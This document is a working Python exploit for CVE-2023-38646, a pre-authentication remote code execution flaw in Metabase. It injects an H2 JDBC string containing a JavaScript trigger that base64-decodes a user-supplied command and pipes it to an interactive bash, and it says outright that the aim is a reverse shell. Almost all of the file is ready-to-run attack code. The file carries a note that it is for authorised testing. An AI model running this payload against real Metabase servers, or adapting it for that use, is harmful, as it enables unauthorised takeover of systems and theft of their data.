from argparse import ArgumentParser
from string import ascii_uppercase
import base64
import random
import requests
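def encode_command_to_b64(payload: str) -> str:
    """Base64-encode *payload* so that the result contains no ``=`` padding.

    The encoded command is spliced into an H2 JDBC connection string (where
    ``=`` separates a property name from its value) and into a bash brace
    expansion, so a trailing ``=`` would corrupt the injected statement.
    Padding is avoided by right-padding the command with spaces until its
    byte length is a multiple of 3; the extra trailing whitespace is harmless
    once bash executes the decoded command.

    Args:
        payload: Shell command to encode. It is encoded as UTF-8, so commands
            containing non-ASCII characters no longer raise
            ``UnicodeEncodeError`` (ASCII input produces the same output as
            before).

    Returns:
        The padding-free base64 string; empty for an empty payload.
    """
    raw = payload.encode('utf-8')
    # base64 emits one '=' for every byte missing from the final 3-byte group,
    # and '=' never appears in the alphabet otherwise, so making the length a
    # multiple of 3 is sufficient to remove it.
    missing = (-len(raw)) % 3
    raw += b' ' * missing
    return base64.b64encode(raw).decode('ascii')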
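# NOTE(review): proof-of-concept for CVE-2023-38646. Run it only against
# systems you are authorised to test: the injected trigger executes an OS
# command with the privileges of the Metabase service account.
parser = ArgumentParser(
    prog='Metabase Pre-Auth RCE Reverse Shell',
    # The original passed this text as the positional `usage` argument, so
    # `-h` printed it in place of the generated usage line.
    description='This script causes a server running Metabase (< 0.46.6.1 for open-source edition and < 1.46.6.1 for enterprise edition) to execute a command through the security flaw described in CVE 2023-38646',
)
parser.add_argument('-u', '--url', type=str, required=True, help='Target URL')
parser.add_argument('-t', '--token', type=str, required=True, help='Setup Token from /api/session/properties')
parser.add_argument('-c', '--command', type=str, required=True, help='Command to be execute in the target host')
args = parser.parse_args()

print('[!] BE SURE TO BE LISTENING ON THE PORT YOU DEFINED IF YOU ARE ISSUING AN COMMAND TO GET REVERSE SHELL [!]\n')
print('[+] Initialized script')

print('[+] Encoding command')
# Base64 keeps shell metacharacters out of the JDBC URL and the trigger body;
# the helper also strips '=' padding, which would otherwise land inside the
# H2 connection string where '=' separates property names from values.
command = encode_command_to_b64(args.command)

# A trailing slash on --url would otherwise yield '<host>//api/setup/validate'.
url = f'{args.url.rstrip("/")}/api/setup/validate'
headers = {
    "Content-Type": "application/json",
    "Connection": "close"
}

# Random trigger name, presumably so repeated runs do not collide with a
# trigger left behind in the H2 database by an earlier attempt. The name is
# not security-sensitive, so `random` is adequate here.
trigger_name = ''.join(random.choice(ascii_uppercase) for _ in range(12))

# The JDBC URL below hard-codes /app/metabase.jar (matches the official Docker
# image layout — TODO confirm for other install types). The `\;` and the
# trailing `--=x` appear to be there to keep H2 from splitting the value at
# the ';' and to comment out the rest of the URL; verify against the H2 URL
# parser before changing either.
payload = {
    "token": args.token,
    "details": {
        "details": {
            "db": "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER {random_string} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,{command}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x".format(random_string=trigger_name, command=command),
            "advanced-options": False,
            "ssl": True
        },
        "name": "x",
        "engine": "h2"
    }
}

print('[+] Making request')
try:
    # Without a timeout the script hangs forever if the host never answers.
    response = requests.post(url, json=payload, headers=headers, timeout=30)
except requests.exceptions.Timeout:
    # The trigger may already have fired even though no response arrived.
    print('[-] Request timed out; check your listener before retrying')
    raise SystemExit(1)
except requests.exceptions.RequestException as exc:
    print(f'[-] Request failed: {exc}')
    raise SystemExit(1)
print('[+] Payload sent')
# A non-2xx status does not by itself mean the command did not run: the
# validation endpoint may reject the bogus database after the trigger has
# already executed. Confirm success on your listener, not from this code.
print(f'[*] HTTP {response.status_code}')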